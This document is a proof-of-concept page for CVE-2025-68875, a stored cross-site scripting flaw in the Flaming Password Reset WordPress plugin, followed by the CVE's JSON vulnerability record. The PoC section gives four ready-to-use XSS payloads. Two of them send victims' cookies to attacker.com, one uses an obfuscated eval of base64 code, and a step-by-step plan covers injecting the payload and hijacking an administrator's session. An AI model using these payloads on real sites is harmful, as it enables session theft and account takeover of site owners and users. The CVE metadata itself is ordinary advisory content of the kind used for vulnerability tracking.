CVE-2025-68875

<!-- CVE-2025-68875 PoC: Stored XSS in Flaming Password Reset --> <!-- Attack Scenario: Inject malicious JavaScript via plugin input field --> <!-- Method 1: Basic XSS Payload --> <script>alert(document.cookie)</script> <!-- Method 2: Cookie Stealing Payload --> <img src=x onerror="this.src='https://attacker.com/steal?c='+document.cookie"> <!-- Method 3: Session Hijacking Payload --> <script> fetch('https://attacker.com/log?data='+btoa(document.cookie)); </script> <!-- Method 4: DOM-based XSS --> <img src="x" onerror="eval(atob('YWxlcnQoJ1hTUyBBdHRhY2snKQ=='))"> <!-- Exploitation Steps: 1. Attacker registers low-privilege account on WordPress site 2. Attacker identifies plugin input fields (password reset related) 3. Attacker injects malicious XSS payload into input field 4. Payload gets stored in database via plugin functionality 5. When admin/user views affected page, payload executes 6. Attacker steals session cookies or performs actions as victim -->

{"cve": {"id": "CVE-2025-68875", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:53.823", "lastModified": "2026-04-27T19:16:37.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jcaruso001 Flaming Password Reset flaming-password-reset allows Stored XSS.This issue affects Flaming Password Reset: from n/a through <= 1.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/flaming-password-reset/vulnerability/wordpress-flaming-password-reset-plugin-1-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}